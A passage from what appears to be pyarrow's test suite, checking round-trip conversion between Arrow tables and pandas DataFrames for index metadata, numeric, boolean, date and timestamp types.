npt.assert_array_equal(result, np_array)
class TestConvertMetadata(object):
"""
Conversion tests for Pandas metadata & indices.
"""
def test_non_string_columns(self):
df = pd.DataFrame({0: [1, 2, 3]})
table = pa.Table.from_pandas(df)
assert table.field(0).name == '0'
def test_from_pandas_with_columns(self):
df = pd.DataFrame({0: [1, 2, 3], 1: [1, 3, 3], 2: [2, 4, 5]},
columns=[1, 0])
table = pa.Table.from_pandas(df, columns=[0, 1])
expected = pa.Table.from_pandas(df[[0, 1]])
assert expected.equals(table)
record_batch_table = pa.RecordBatch.from_pandas(df, columns=[0, 1])
record_batch_expected = pa.RecordBatch.from_pandas(df[[0, 1]])
assert record_batch_expected.equals(record_batch_table)
def test_column_index_names_are_preserved(self):
df = pd.DataFrame({'data': [1, 2, 3]})
df.columns.names = ['a']
_check_pandas_roundtrip(df, preserve_index=True)
def test_range_index_shortcut(self):
# ARROW-1639
index_name = 'foo'
df = pd.DataFrame({'a': [1, 2, 3, 4]},
index=pd.RangeIndex(0, 8, step=2, name=index_name))
df2 = pd.DataFrame({'a': [4, 5, 6, 7]},
index=pd.RangeIndex(0, 4))
table = pa.Table.from_pandas(df)
table_no_index_name = pa.Table.from_pandas(df2)
# The RangeIndex is tracked in the metadata only
assert len(table.schema) == 1
result = table.to_pandas()
tm.assert_frame_equal(result, df)
assert isinstance(result.index, pd.RangeIndex)
assert _pandas_api.get_rangeindex_attribute(result.index, 'step') == 2
assert result.index.name == index_name
result2 = table_no_index_name.to_pandas()
tm.assert_frame_equal(result2, df2)
assert isinstance(result2.index, pd.RangeIndex)
assert _pandas_api.get_rangeindex_attribute(result2.index, 'step') == 1
assert result2.index.name is None
def test_range_index_force_serialization(self):
# ARROW-5427: preserve_index=True will force the RangeIndex to
# be serialized as a column rather than tracked more
# efficiently as metadata
df = pd.DataFrame({'a': [1, 2, 3, 4]},
index=pd.RangeIndex(0, 8, step=2, name='foo'))
table = pa.Table.from_pandas(df, preserve_index=True)
assert table.num_columns == 2
assert 'foo' in table.column_names
restored = table.to_pandas()
tm.assert_frame_equal(restored, df)
def test_rangeindex_doesnt_warn(self):
# ARROW-5606: pandas 0.25 deprecated private _start/stop/step
# attributes -> can be removed if support < pd 0.25 is dropped
df = pd.DataFrame(np.random.randn(4, 2), columns=['a', 'b'])
with pytest.warns(None) as record:
_check_pandas_roundtrip(df, preserve_index=True)
assert len(record) == 0
def test_multiindex_columns(self):
columns = pd.MultiIndex.from_arrays([
['one', 'two'], ['X', 'Y']
])
df = pd.DataFrame([(1, 'a'), (2, 'b'), (3, 'c')], columns=columns)
_check_pandas_roundtrip(df, preserve_index=True)
def test_multiindex_columns_with_dtypes(self):
columns = pd.MultiIndex.from_arrays(
[
['one', 'two'],
pd.DatetimeIndex(['2017-08-01', '2017-08-02']),
],
names=['level_1', 'level_2'],
)
df = pd.DataFrame([(1, 'a'), (2, 'b'), (3, 'c')], columns=columns)
_check_pandas_roundtrip(df, preserve_index=True)
def test_multiindex_with_datetimes(self):
# ARROW-3651. This bug occurred only when the dtype of the columns is
# object. It does not occur for datetime64[ns]
df = pd.DataFrame(1, index=pd.Index(list(range(5)), name='index'),
columns=pd.Index([datetime(2018, 1, 1)], dtype='O'))
assert df.columns.dtype == 'object'
reconstructed = pa.table(df).to_pandas()
# The reconstruction process results in object->datetime64[ns]
df_expected = df.copy()
df_expected.columns = df.columns.values
assert df_expected.columns.dtype == 'datetime64[ns]'
tm.assert_frame_equal(df_expected, reconstructed)
def test_multiindex_columns_unicode(self):
columns = pd.MultiIndex.from_arrays([[u'あ', u'い'], ['X', 'Y']])
df = pd.DataFrame([(1, 'a'), (2, 'b'), (3, 'c')], columns=columns)
_check_pandas_roundtrip(df, preserve_index=True)
def test_multiindex_doesnt_warn(self):
# ARROW-3953: pandas 0.24 rename of MultiIndex labels to codes
columns = pd.MultiIndex.from_arrays([['one', 'two'], ['X', 'Y']])
df = pd.DataFrame([(1, 'a'), (2, 'b'), (3, 'c')], columns=columns)
with pytest.warns(None) as record:
_check_pandas_roundtrip(df, preserve_index=True)
assert len(record) == 0
def test_integer_index_column(self):
df = pd.DataFrame([(1, 'a'), (2, 'b'), (3, 'c')])
_check_pandas_roundtrip(df, preserve_index=True)
def test_index_metadata_field_name(self):
# test None case, and strangely named non-index columns
df = pd.DataFrame(
[(1, 'a', 3.1), (2, 'b', 2.2), (3, 'c', 1.3)],
index=pd.MultiIndex.from_arrays(
[['c', 'b', 'a'], [3, 2, 1]],
names=[None, 'foo']
),
columns=['a', None, '__index_level_0__'],
)
with pytest.warns(UserWarning):
t = pa.Table.from_pandas(df, preserve_index=True)
js = t.schema.pandas_metadata
col1, col2, col3, idx0, foo = js['columns']
assert col1['name'] == 'a'
assert col1['name'] == col1['field_name']
assert col2['name'] is None
assert col2['field_name'] == 'None'
assert col3['name'] == '__index_level_0__'
assert col3['name'] == col3['field_name']
idx0_descr, foo_descr = js['index_columns']
assert idx0_descr == '__index_level_0__'
assert idx0['field_name'] == idx0_descr
assert idx0['name'] is None
assert foo_descr == 'foo'
assert foo['field_name'] == foo_descr
assert foo['name'] == foo_descr
def test_categorical_column_index(self):
df = pd.DataFrame(
[(1, 'a', 2.0), (2, 'b', 3.0), (3, 'c', 4.0)],
columns=pd.Index(list('def'), dtype='category')
)
t = pa.Table.from_pandas(df, preserve_index=True)
js = t.schema.pandas_metadata
column_indexes, = js['column_indexes']
assert column_indexes['name'] is None
assert column_indexes['pandas_type'] == 'categorical'
assert column_indexes['numpy_type'] == 'int8'
md = column_indexes['metadata']
assert md['num_categories'] == 3
assert md['ordered'] is False
def test_string_column_index(self):
df = pd.DataFrame(
[(1, 'a', 2.0), (2, 'b', 3.0), (3, 'c', 4.0)],
columns=pd.Index(list('def'), name='stringz')
)
t = pa.Table.from_pandas(df, preserve_index=True)
js = t.schema.pandas_metadata
column_indexes, = js['column_indexes']
assert column_indexes['name'] == 'stringz'
assert column_indexes['name'] == column_indexes['field_name']
assert column_indexes['numpy_type'] == 'object'
assert column_indexes['pandas_type'] == (
'bytes' if six.PY2 else 'unicode'
)
md = column_indexes['metadata']
if not six.PY2:
assert len(md) == 1
assert md['encoding'] == 'UTF-8'
else:
assert md is None or 'encoding' not in md
def test_datetimetz_column_index(self):
df = pd.DataFrame(
[(1, 'a', 2.0), (2, 'b', 3.0), (3, 'c', 4.0)],
columns=pd.date_range(
start='2017-01-01', periods=3, tz='America/New_York'
)
)
t = pa.Table.from_pandas(df, preserve_index=True)
js = t.schema.pandas_metadata
column_indexes, = js['column_indexes']
assert column_indexes['name'] is None
assert column_indexes['pandas_type'] == 'datetimetz'
assert column_indexes['numpy_type'] == 'datetime64[ns]'
md = column_indexes['metadata']
assert md['timezone'] == 'America/New_York'
def test_datetimetz_row_index(self):
df = pd.DataFrame({
'a': pd.date_range(
start='2017-01-01', periods=3, tz='America/New_York'
)
})
df = df.set_index('a')
_check_pandas_roundtrip(df, preserve_index=True)
def test_categorical_row_index(self):
df = pd.DataFrame({'a': [1, 2, 3], 'b': [1, 2, 3]})
df['a'] = df.a.astype('category')
df = df.set_index('a')
_check_pandas_roundtrip(df, preserve_index=True)
def test_duplicate_column_names_does_not_crash(self):
df = pd.DataFrame([(1, 'a'), (2, 'b')], columns=list('aa'))
with pytest.raises(ValueError):
pa.Table.from_pandas(df)
def test_dictionary_indices_boundscheck(self):
# ARROW-1658. No validation of indices leads to segfaults in pandas
indices = [[0, 1], [0, -1]]
for inds in indices:
arr = pa.DictionaryArray.from_arrays(inds, ['a'], safe=False)
batch = pa.RecordBatch.from_arrays([arr], ['foo'])
table = pa.Table.from_batches([batch, batch, batch])
with pytest.raises(pa.ArrowInvalid):
arr.to_pandas()
with pytest.raises(pa.ArrowInvalid):
table.to_pandas()
def test_unicode_with_unicode_column_and_index(self):
df = pd.DataFrame({u'あ': [u'い']}, index=[u'う'])
_check_pandas_roundtrip(df, preserve_index=True)
def test_mixed_column_names(self):
# mixed type column names are not reconstructed exactly
df = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
for cols in [[u'あ', b'a'], [1, '2'], [1, 1.5]]:
df.columns = pd.Index(cols, dtype=object)
# assert that the from_pandas raises the warning
with pytest.warns(UserWarning):
pa.Table.from_pandas(df)
expected = df.copy()
expected.columns = df.columns.astype(six.text_type)
with pytest.warns(UserWarning):
_check_pandas_roundtrip(df, expected=expected,
preserve_index=True)
def test_binary_column_name(self):
column_data = [u'い']
key = u'あ'.encode('utf8')
data = {key: column_data}
df = pd.DataFrame(data)
# we can't use _check_pandas_roundtrip here because our metdata
# is always decoded as utf8: even if binary goes in, utf8 comes out
t = pa.Table.from_pandas(df, preserve_index=True)
df2 = t.to_pandas()
assert df.values[0] == df2.values[0]
assert df.index.values[0] == df2.index.values[0]
assert df.columns[0] == key
def test_multiindex_duplicate_values(self):
num_rows = 3
numbers = list(range(num_rows))
index = pd.MultiIndex.from_arrays(
[['foo', 'foo', 'bar'], numbers],
names=['foobar', 'some_numbers'],
)
df = pd.DataFrame({'numbers': numbers}, index=index)
table = pa.Table.from_pandas(df)
result_df = table.to_pandas()
tm.assert_frame_equal(result_df, df)
def test_metadata_with_mixed_types(self):
df = pd.DataFrame({'data': [b'some_bytes', u'some_unicode']})
table = pa.Table.from_pandas(df)
js = table.schema.pandas_metadata
assert 'mixed' not in js
data_column = js['columns'][0]
assert data_column['pandas_type'] == 'bytes'
assert data_column['numpy_type'] == 'object'
def test_ignore_metadata(self):
df = pd.DataFrame({'a': [1, 2, 3], 'b': ['foo', 'bar', 'baz']},
index=['one', 'two', 'three'])
table = pa.Table.from_pandas(df)
result = table.to_pandas(ignore_metadata=True)
expected = (table.cast(table.schema.remove_metadata())
.to_pandas())
assert result.equals(expected)
def test_list_metadata(self):
df = pd.DataFrame({'data': [[1], [2, 3, 4], [5] * 7]})
schema = pa.schema([pa.field('data', type=pa.list_(pa.int64()))])
table = pa.Table.from_pandas(df, schema=schema)
js = table.schema.pandas_metadata
assert 'mixed' not in js
data_column = js['columns'][0]
assert data_column['pandas_type'] == 'list[int64]'
assert data_column['numpy_type'] == 'object'
def test_struct_metadata(self):
df = pd.DataFrame({'dicts': [{'a': 1, 'b': 2}, {'a': 3, 'b': 4}]})
table = pa.Table.from_pandas(df)
pandas_metadata = table.schema.pandas_metadata
assert pandas_metadata['columns'][0]['pandas_type'] == 'object'
def test_decimal_metadata(self):
expected = pd.DataFrame({
'decimals': [
decimal.Decimal('394092382910493.12341234678'),
-decimal.Decimal('314292388910493.12343437128'),
]
})
table = pa.Table.from_pandas(expected)
js = table.schema.pandas_metadata
assert 'mixed' not in js
data_column = js['columns'][0]
assert data_column['pandas_type'] == 'decimal'
assert data_column['numpy_type'] == 'object'
assert data_column['metadata'] == {'precision': 26, 'scale': 11}
def test_table_column_subset_metadata(self):
# ARROW-1883
# non-default index
for index in [
pd.Index(['a', 'b', 'c'], name='index'),
pd.date_range("2017-01-01", periods=3, tz='Europe/Brussels')]:
df = pd.DataFrame({'a': [1, 2, 3],
'b': [.1, .2, .3]}, index=index)
table = pa.Table.from_pandas(df)
table_subset = table.remove_column(1)
result = table_subset.to_pandas()
tm.assert_frame_equal(result, df[['a']])
table_subset2 = table_subset.remove_column(1)
result = table_subset2.to_pandas()
tm.assert_frame_equal(result, df[['a']].reset_index(drop=True))
def test_empty_list_metadata(self):
# Create table with array of empty lists, forced to have type
# list(string) in pyarrow
c1 = [["test"], ["a", "b"], None]
c2 = [[], [], []]
arrays = OrderedDict([
('c1', pa.array(c1, type=pa.list_(pa.string()))),
('c2', pa.array(c2, type=pa.list_(pa.string()))),
])
rb = pa.RecordBatch.from_arrays(
list(arrays.values()),
list(arrays.keys())
)
tbl = pa.Table.from_batches([rb])
# First roundtrip changes schema, because pandas cannot preserve the
# type of empty lists
df = tbl.to_pandas()
tbl2 = pa.Table.from_pandas(df)
md2 = tbl2.schema.pandas_metadata
# Second roundtrip
df2 = tbl2.to_pandas()
expected = pd.DataFrame(OrderedDict([('c1', c1), ('c2', c2)]))
tm.assert_frame_equal(df2, expected)
assert md2['columns'] == [
{
'name': 'c1',
'field_name': 'c1',
'metadata': None,
'numpy_type': 'object',
'pandas_type': 'list[unicode]',
},
{
'name': 'c2',
'field_name': 'c2',
'metadata': None,
'numpy_type': 'object',
'pandas_type': 'list[empty]',
}
]
def test_metadata_pandas_version(self):
df = pd.DataFrame({'a': [1, 2, 3], 'b': [1, 2, 3]})
table = pa.Table.from_pandas(df)
assert table.schema.pandas_metadata['pandas_version'] is not None
class TestConvertPrimitiveTypes(object):
"""
Conversion tests for primitive (e.g. numeric) types.
"""
def test_float_no_nulls(self):
data = {}
fields = []
dtypes = [('f2', pa.float16()),
('f4', pa.float32()),
('f8', pa.float64())]
num_values = 100
for numpy_dtype, arrow_dtype in dtypes:
values = np.random.randn(num_values)
data[numpy_dtype] = values.astype(numpy_dtype)
fields.append(pa.field(numpy_dtype, arrow_dtype))
df = pd.DataFrame(data)
schema = pa.schema(fields)
_check_pandas_roundtrip(df, expected_schema=schema)
def test_float_nulls(self):
num_values = 100
null_mask = np.random.randint(0, 10, size=num_values) < 3
dtypes = [('f2', pa.float16()),
('f4', pa.float32()),
('f8', pa.float64())]
names = ['f2', 'f4', 'f8']
expected_cols = []
arrays = []
fields = []
for name, arrow_dtype in dtypes:
values = np.random.randn(num_values).astype(name)
arr = pa.array(values, from_pandas=True, mask=null_mask)
arrays.append(arr)
fields.append(pa.field(name, arrow_dtype))
values[null_mask] = np.nan
expected_cols.append(values)
ex_frame = pd.DataFrame(dict(zip(names, expected_cols)),
columns=names)
table = pa.Table.from_arrays(arrays, names)
assert table.schema.equals(pa.schema(fields))
result = table.to_pandas()
tm.assert_frame_equal(result, ex_frame)
def test_float_nulls_to_ints(self):
# ARROW-2135
df = pd.DataFrame({"a": [1.0, 2.0, pd.np.NaN]})
schema = pa.schema([pa.field("a", pa.int16(), nullable=True)])
table = pa.Table.from_pandas(df, schema=schema, safe=False)
assert table[0].to_pylist() == [1, 2, None]
tm.assert_frame_equal(df, table.to_pandas())
def test_float_nulls_to_boolean(self):
s = pd.Series([0.0, 1.0, 2.0, None, -3.0])
expected = pd.Series([False, True, True, None, True])
_check_array_roundtrip(s, expected=expected, type=pa.bool_())
def test_series_from_pandas_false_respected(self):
# Check that explicit from_pandas=False is respected
s = pd.Series([0.0, np.nan])
arr = pa.array(s, from_pandas=False)
assert arr.null_count == 0
assert np.isnan(arr[1].as_py())
def test_integer_no_nulls(self):
data = OrderedDict()
fields = []
numpy_dtypes = [
('i1', pa.int8()), ('i2', pa.int16()),
('i4', pa.int32()), ('i8', pa.int64()),
('u1', pa.uint8()), ('u2', pa.uint16()),
('u4', pa.uint32()), ('u8', pa.uint64()),
('longlong', pa.int64()), ('ulonglong', pa.uint64())
]
num_values = 100
for dtype, arrow_dtype in numpy_dtypes:
info = np.iinfo(dtype)
values = np.random.randint(max(info.min, np.iinfo(np.int_).min),
min(info.max, np.iinfo(np.int_).max),
size=num_values)
data[dtype] = values.astype(dtype)
fields.append(pa.field(dtype, arrow_dtype))
df = pd.DataFrame(data)
schema = pa.schema(fields)
_check_pandas_roundtrip(df, expected_schema=schema)
def test_all_integer_types(self):
# Test all Numpy integer aliases
data = OrderedDict()
numpy_dtypes = ['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8',
'byte', 'ubyte', 'short', 'ushort', 'intc', 'uintc',
'int_', 'uint', 'longlong', 'ulonglong']
for dtype in numpy_dtypes:
data[dtype] = np.arange(12, dtype=dtype)
df = pd.DataFrame(data)
_check_pandas_roundtrip(df)
# Do the same with pa.array()
# (for some reason, it doesn't use the same code paths at all)
for np_arr in data.values():
arr = pa.array(np_arr)
assert arr.to_pylist() == np_arr.tolist()
def test_integer_byteorder(self):
# Byteswapped arrays are not supported yet
int_dtypes = ['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8']
for dt in int_dtypes:
for order in '=<>':
data = np.array([1, 2, 42], dtype=order + dt)
for np_arr in (data, data[::2]):
if data.dtype.isnative:
arr = pa.array(data)
assert arr.to_pylist() == data.tolist()
else:
with pytest.raises(NotImplementedError):
arr = pa.array(data)
def test_integer_with_nulls(self):
# pandas requires upcast to float dtype
int_dtypes = ['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8']
num_values = 100
null_mask = np.random.randint(0, 10, size=num_values) < 3
expected_cols = []
arrays = []
for name in int_dtypes:
values = np.random.randint(0, 100, size=num_values)
arr = pa.array(values, mask=null_mask)
arrays.append(arr)
expected = values.astype('f8')
expected[null_mask] = np.nan
expected_cols.append(expected)
ex_frame = pd.DataFrame(dict(zip(int_dtypes, expected_cols)),
columns=int_dtypes)
table = pa.Table.from_arrays(arrays, int_dtypes)
result = table.to_pandas()
tm.assert_frame_equal(result, ex_frame)
def test_array_from_pandas_type_cast(self):
arr = np.arange(10, dtype='int64')
target_type = pa.int8()
result = pa.array(arr, type=target_type)
expected = pa.array(arr.astype('int8'))
assert result.equals(expected)
def test_boolean_no_nulls(self):
num_values = 100
np.random.seed(0)
df = pd.DataFrame({'bools': np.random.randn(num_values) > 0})
field = pa.field('bools', pa.bool_())
schema = pa.schema([field])
_check_pandas_roundtrip(df, expected_schema=schema)
def test_boolean_nulls(self):
# pandas requires upcast to object dtype
num_values = 100
np.random.seed(0)
mask = np.random.randint(0, 10, size=num_values) < 3
values = np.random.randint(0, 10, size=num_values) < 5
arr = pa.array(values, mask=mask)
expected = values.astype(object)
expected[mask] = None
field = pa.field('bools', pa.bool_())
schema = pa.schema([field])
ex_frame = pd.DataFrame({'bools': expected})
table = pa.Table.from_arrays([arr], ['bools'])
assert table.schema.equals(schema)
result = table.to_pandas()
tm.assert_frame_equal(result, ex_frame)
def test_boolean_to_int(self):
# test from dtype=bool
s = pd.Series([True, True, False, True, True] * 2)
expected = pd.Series([1, 1, 0, 1, 1] * 2)
_check_array_roundtrip(s, expected=expected, type=pa.int64())
def test_boolean_objects_to_int(self):
# test from dtype=object
s = pd.Series([True, True, False, True, True] * 2, dtype=object)
expected = pd.Series([1, 1, 0, 1, 1] * 2)
expected_msg = 'Expected integer, got bool'
with pytest.raises(pa.ArrowTypeError, match=expected_msg):
_check_array_roundtrip(s, expected=expected, type=pa.int64())
def test_boolean_nulls_to_float(self):
# test from dtype=object
s = pd.Series([True, True, False, None, True] * 2)
expected = pd.Series([1.0, 1.0, 0.0, None, 1.0] * 2)
_check_array_roundtrip(s, expected=expected, type=pa.float64())
def test_boolean_multiple_columns(self):
# ARROW-6325 (multiple columns resulting in strided conversion)
df = pd.DataFrame(np.ones((3, 2), dtype='bool'), columns=['a', 'b'])
_check_pandas_roundtrip(df)
def test_float_object_nulls(self):
arr = np.array([None, 1.5, np.float64(3.5)] * 5, dtype=object)
df = pd.DataFrame({'floats': arr})
expected = pd.DataFrame({'floats': pd.to_numeric(arr)})
field = pa.field('floats', pa.float64())
schema = pa.schema([field])
_check_pandas_roundtrip(df, expected=expected,
expected_schema=schema)
def test_float_with_null_as_integer(self):
# ARROW-2298
s = pd.Series([np.nan, 1., 2., np.nan])
types = [pa.int8(), pa.int16(), pa.int32(), pa.int64(),
pa.uint8(), pa.uint16(), pa.uint32(), pa.uint64()]
for ty in types:
result = pa.array(s, type=ty)
expected = pa.array([None, 1, 2, None], type=ty)
assert result.equals(expected)
df = pd.DataFrame({'has_nulls': s})
schema = pa.schema([pa.field('has_nulls', ty)])
result = pa.Table.from_pandas(df, schema=schema,
preserve_index=False)
assert result[0].chunk(0).equals(expected)
def test_int_object_nulls(self):
arr = np.array([None, 1, np.int64(3)] * 5, dtype=object)
df = pd.DataFrame({'ints': arr})
expected = pd.DataFrame({'ints': pd.to_numeric(arr)})
field = pa.field('ints', pa.int64())
schema = pa.schema([field])
_check_pandas_roundtrip(df, expected=expected,
expected_schema=schema)
def test_boolean_object_nulls(self):
arr = np.array([False, None, True] * 100, dtype=object)
df = pd.DataFrame({'bools': arr})
field = pa.field('bools', pa.bool_())
schema = pa.schema([field])
_check_pandas_roundtrip(df, expected_schema=schema)
def test_all_nulls_cast_numeric(self):
arr = np.array([None], dtype=object)
def _check_type(t):
a2 = pa.array(arr, type=t)
assert a2.type == t
assert a2[0].as_py() is None
_check_type(pa.int32())
_check_type(pa.float64())
def test_half_floats_from_numpy(self):
arr = np.array([1.5, np.nan], dtype=np.float16)
a = pa.array(arr, type=pa.float16())
x, y = a.to_pylist()
assert isinstance(x, np.float16)
assert x == 1.5
assert isinstance(y, np.float16)
assert np.isnan(y)
a = pa.array(arr, type=pa.float16(), from_pandas=True)
x, y = a.to_pylist()
assert isinstance(x, np.float16)
assert x == 1.5
assert y is None
@pytest.mark.parametrize('dtype',
['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8'])
def test_array_integer_object_nulls_option(dtype):
num_values = 100
null_mask = np.random.randint(0, 10, size=num_values) < 3
values = np.random.randint(0, 100, size=num_values, dtype=dtype)
array = pa.array(values, mask=null_mask)
if null_mask.any():
expected = values.astype('O')
expected[null_mask] = None
else:
expected = values
result = array.to_pandas(integer_object_nulls=True)
np.testing.assert_equal(result, expected)
@pytest.mark.parametrize('dtype',
['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8'])
def test_table_integer_object_nulls_option(dtype):
num_values = 100
null_mask = np.random.randint(0, 10, size=num_values) < 3
values = np.random.randint(0, 100, size=num_values, dtype=dtype)
array = pa.array(values, mask=null_mask)
if null_mask.any():
expected = values.astype('O')
expected[null_mask] = None
else:
expected = values
expected = pd.DataFrame({dtype: expected})
table = pa.Table.from_arrays([array], [dtype])
result = table.to_pandas(integer_object_nulls=True)
tm.assert_frame_equal(result, expected)
class TestConvertDateTimeLikeTypes(object):
"""
Conversion tests for datetime- and timestamp-like types (date64, etc.).
"""
def test_timestamps_notimezone_no_nulls(self):
df = pd.DataFrame({
'datetime64': np.array([
'2007-07-13T01:23:34.123456789',
'2006-01-13T12:34:56.432539784',
'2010-08-13T05:46:57.437699912'],
dtype='datetime64[ns]')
})
field = pa.field('datetime64', pa.timestamp('ns'))
schema = pa.schema([field])
_check_pandas_roundtrip(
df,
expected_schema=schema,
)
def test_timestamps_notimezone_nulls(self):
df = pd.DataFrame({
'datetime64': np.array([
'2007-07-13T01:23:34.123456789',
None,
'2010-08-13T05:46:57.437699912'],
dtype='datetime64[ns]')
})
field = pa.field('datetime64', pa.timestamp('ns'))
schema = pa.schema([field])
_check_pandas_roundtrip(
df,
expected_schema=schema,
)
def test_timestamps_with_timezone(self):
df = pd.DataFrame({
'datetime64': np.array([
'2007-07-13T01:23:34.123',
'2006-01-13T12:34:56.432',
'2010-08-13T05:46:57.437'],
dtype='datetime64[ms]')
})
df['datetime64'] = df['datetime64'].dt.tz_localize('US/Eastern')
_check_pandas_roundtrip(df)
_check_series_roundtrip(df['datetime64'])
# drop-in a null and ns instead of ms
df = pd.DataFrame({
'datetime64': np.array([
'2007-07-13T01:23:34.123456789',
None,
'2006-01-13T12:34:56.432539784',
'2010-08-13T05:46:57.437699912'],
dtype='datetime64[ns]')
})
df['datetime64'] = df['datetime64'].dt.tz_localize('US/Eastern')
_check_pandas_roundtrip(df)
def test_python_datetime(self):
# ARROW-2106
date_array = [datetime.today() + timedelta(days=x) for x in range(10)]
df = pd.DataFrame({
'datetime': pd.Series(date_array, dtype=object)
})
table = pa.Table.from_pandas(df)
assert isinstance(table[0].chunk(0), pa.TimestampArray)
result = table.to_pandas()
expected_df = pd.DataFrame({
'datetime': date_array
})
tm.assert_frame_equal(expected_df, result)
def test_python_datetime_with_pytz_tzinfo(self):
for tz in [pytz.utc, pytz.timezone('US/Eastern'), pytz.FixedOffset(1)]:
values = [datetime(2018, 1, 1, 12, 23, 45, tzinfo=tz)]
df = pd.DataFrame({'datetime': values})
_check_pandas_roundtrip(df)
@h.given(st.none() | tzst.timezones())
def test_python_datetime_with_pytz_timezone(self, tz):
values = [datetime(2018, 1, 1, 12, 23, 45, tzinfo=tz)]
df = pd.DataFrame({'datetime': values})
_check_pandas_roundtrip(df)
@pytest.mark.skipif(six.PY2, reason='datetime.timezone is available since '
'python version 3.2')
def test_python_datetime_with_timezone_tzinfo(self):
from datetime import timezone
values = [datetime(2018, 1, 1, 12, 23, 45, tzinfo=pytz.utc)]
df = pd.DataFrame({'datetime': values})
_check_pandas_roundtrip(df)
# datetime.timezone is going to be pytz.FixedOffset
hours = 1
tz_timezone = timezone(timedelta(hours=hours))
tz_pytz = pytz.FixedOffset(hours * 60)
values = [datetime(2018, 1, 1, 12, 23, 45, tzinfo=tz_timezone)]
values_exp = [datetime(2018, 1, 1, 12, 23, 45, tzinfo=tz_pytz)]
df = pd.DataFrame({'datetime': values})
df_exp = pd.DataFrame({'datetime': values_exp})
_check_pandas_roundtrip(df, expected=df_exp)
def test_python_datetime_subclass(self):
class MyDatetime(datetime):
# see https://github.com/pandas-dev/pandas/issues/21142
nanosecond = 0.0
date_array = [MyDatetime(2000, 1, 1, 1, 1, 1)]
df = pd.DataFrame({"datetime": pd.Series(date_array, dtype=object)})
table = pa.Table.from_pandas(df)
assert isinstance(table[0].chunk(0), pa.TimestampArray)
result = table.to_pandas()
expected_df = pd.DataFrame({"datetime": date_array})
# https://github.com/pandas-dev/pandas/issues/21142
expected_df["datetime"] = pd.to_datetime(expected_df["datetime"])
tm.assert_frame_equal(expected_df, result)
def test_python_date_subclass(self):
class MyDate(date):
pass
date_array = [MyDate(2000, 1, 1)]
df = pd.DataFrame({"date": pd.Series(date_array, dtype=object)})
table = pa.Table.from_pandas(df)
assert isinstance(table[0].chunk(0), pa.Date32Array)
result = table.to_pandas()
expected_df = pd.DataFrame(
{"date": np.array([date(2000, 1, 1)], dtype=object)}
)
tm.assert_frame_equal(expected_df, result)
def test_datetime64_to_date32(self):
# ARROW-1718
arr = pa.array([date(2017, 10, 23), None])
c = pa.chunked_array([arr])
s = c.to_pandas()
arr2 = pa.Array.from_pandas(s, type=pa.date32())
assert arr2.equals(arr.cast('date32'))
@pytest.mark.parametrize('mask', [
None,
np.array([True, False, False]),
])
def test_pandas_datetime_to_date64(self, mask):
s = pd.to_datetime([
'2018-05-10T00:00:00',
'2018-05-11T00:00:00',
'2018-05-12T00:00:00',
])
arr = pa.Array.from_pandas(s, type=pa.date64(), mask=mask)
data = np.array([
date(2018, 5, 10),
date(2018, 5, 11),
date(2018, 5, 12)
])
expected = pa.array(data, mask=mask, type=pa.date64())
assert arr.equals(expected)
@pytest.mark.parametrize('mask', [
None,
np.array([True, False, False])
])
def test_pandas_datetime_to_date64_failures(self, mask):
s = pd.to_datetime([
'2018-05-10T10:24:01',
'2018-05-11T10:24:01',
'2018-05-12T10:24:01',
])
expected_msg = 'Timestamp value had non-zero intraday milliseconds'
with pytest.raises(pa.ArrowInvalid, match=expected_msg):
pa.Array.from_pandas(s, type=pa.date64(), mask=mask)
def test_array_types_date_as_object(self):
data = [date(2000, 1, 1),
None,
date(1970, 1, 1),
date(2040, 2, 26)]
expected_d = np.array(['2000-01-01', None, '1970-01-01',
'2040-02-26'], dtype='datetime64[D]')
expected_ns = np.array(['2000-01-01', None, '1970-01-01',
'2040-02-26'], dtype='datetime64[ns]')
objects = [pa.array(data),
pa.chunked_array([data])]
for obj in objects:
result = obj.to_pandas()
expected_obj = expected_d.astype(object)
assert result.dtype == expected_obj.dtype
npt.assert_array_equal(result, expected_obj)
result = obj.to_pandas(date_as_object=False)
assert result.dtype == expected_ns.dtype
npt.assert_array_equal(result, expected_ns)
def test_table_convert_date_as_object(self):
df = pd.DataFrame({
'date': [date(2000, 1, 1),
None,
date(1970, 1, 1),
date(2040, 2, 26)]})
table = pa.Table.from_pandas(df, preserve_index=False)
df_datetime = table.to_pandas(date_as_object=False)
df_object = table.to_pandas()
tm.assert_frame_equal(df.astype('datetime64[ns]'), df_datetime,
check_dtype=True)
tm.assert_frame_equal(df, df_object, check_dtype=True)
def test_date_infer(self):
df = pd.DataFrame({
'date': [date(2000, 1, 1),
None,
date(1970, 1, 1),
date(2040, 2, 26)]})
table = pa.Table.from_pandas(df, preserve_index=False)
field = pa.field('date', pa.date32())
# schema's metadata is generated by from_pandas conversion
expected_schema = pa.schema([field], metadata=table.schema.metadata)
assert table.schema.equals(expected_schema)
result = table.to_pandas()
tm.assert_frame_equal(result, df)
def test_date_mask(self):
arr = np.array([date(2017, 4, 3), date(2017, 4, 4)],
dtype='datetime64[D]')
mask = [True, False]
result = pa.array(arr, mask=np.array(mask))
expected = np.array([None, date(2017, 4, 4)], dtype='datetime64[D]')
expected = pa.array(expected, from_pandas=True)
assert expected.equals(result)
def test_date_objects_typed(self):
arr = np.array([
date(2017, 4, 3),
None,
date(2017, 4, 4),
date(2017, 4, 5)], dtype=object)
arr_i4 = np.array([17259, -1, 17260, 17261], dtype='int32')
arr_i8 = arr_i4.astype('int64') * 86400000
mask = np.array([False, True, False, False])
t32 = pa.date32()
t64 = pa.date64()
a32 = pa.array(arr, type=t32)
a64 = pa.array(arr, type=t64)
a32_expected = pa.array(arr_i4, mask=mask, type=t32)
a64_expected = pa.array(arr_i8, mask=mask, type=t64)
assert a32.equals(a32_expected)
assert a64.equals(a64_expected)
# Test converting back to pandas
colnames = ['date32', 'date64']
table = pa.Table.from_arrays([a32, a64], colnames)
ex_values = (np.array(['2017-04-03', '2017-04-04', '2017-04-04',
'2017-04-05'],
dtype='datetime64[D]'))
ex_values[1] = pd.NaT.value
ex_datetime64ns = ex_values.astype('datetime64[ns]')
expected_pandas = pd.DataFrame({'date32': ex_datetime64ns,
'date64': ex_datetime64ns},
columns=colnames)
table_pandas = table.to_pandas(date_as_object=False)
tm.assert_frame_equal(table_pandas, expected_pandas)
